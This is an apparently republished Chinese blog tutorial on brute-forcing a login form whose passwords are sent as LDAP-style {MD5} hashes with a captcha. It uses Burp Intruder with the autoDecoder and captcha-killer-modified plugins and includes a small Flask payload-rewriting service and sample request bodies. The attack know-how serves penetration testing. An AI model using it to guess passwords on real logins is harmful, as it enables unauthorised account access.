Java教程
登录口爆破之ldap的md5加密、验证码认证
本文主要是介绍登录口爆破之ldap的md5加密、验证码认证,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
ldap的md5加密配合autoDecoder插件、captcha-killer-modified插件
autoDecoder例
需要传入的数据包为:
{"username":"admin","password":"{MD5}ISMvKXpXpadDiUoOSoAfww==","code":"YJIV"}
intruder数据包设置如下:
{"username":"admin","password":"§1§","code":"§JOEJ§"}
intruder设置如下:
由于我们只针对intruder里的账号密码进行爆破,所以解密接口我们用不到,直接捕捉到数据包直接返回即可:
@app.route('/decode',methods=["POST"]) # 不解密
def decrypt():
param = request.form.get('data') # 获取 post 参数
return param
加密服务端代码如下:
# -*- coding:utf-8 -*-
# author:f0ngf0ng
# ldap的md5加密爆破
from flask import Flask,Response,request
from pyDes import *
import base64,hashlib,json
def hash_md5(data):
md = hashlib.md5()
md.update(str(data))
a = md.digest()
b = base64.b64encode(a)
return b
app = Flask(__name__)
@app.route('/encode',methods=["POST"])
def encrypt():
param = request.form.get('data') # 获取 post 参数
data = json.loads(param)
print(data)
encry_param = param.replace( "password': '"+ data['password'],"password': '"+"{MD5}" + data['password']) # 密文替换明文,且添加{MD5}关键字
return encry_param
@app.route('/decode',methods=["POST"]) # 不解密
def decrypt():
param = request.form.get('data') # 获取 post 参数
return param
if __name__ == '__main__':
app.debug = True # 设置调试模式,生产模式的时候要关掉debug
app.run(host="0.0.0.0",port="8888")
运行如下
python flask.py
autoDecoder设置如下:
captcha-killer-modified插件页面如下:
爆破如下:
https://github.com/f0ng/autoDecoder
https://github.com/f0ng/captcha-killer-modified
这篇关于登录口爆破之ldap的md5加密、验证码认证的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
怎么通过 JavaScript 或其他编程语言来实现监听屏幕高度变化功能?-icode9专业技术文章分享11-13
-
聊聊我们那些年用过的表达式引擎组件11-12
-
让项目数据更有说服力:五款必备数据可视化管理工具推荐11-12
-
人到一定年纪,要学会远离多巴胺11-12
-
解读:精益生产管理的目的是什么?如何操作?11-12
-
Sku预研作业11-12
-
文心一言API密钥:分步申请指南11-12
-
初学者指南:轻松掌握后台交互11-12
-
从零开始学习:封装基础知识详解11-12
-
JSON对象入门教程:轻松掌握基础用法11-12
-
后台交互学习入门指南11-12
-
封装入门:Python面向对象编程的第一步11-12
-
后台交互入门:轻松掌握基础概念与操作11-12
-
python获取小说11-12
-
后台交互教程:新手入门指南11-12
栏目导航
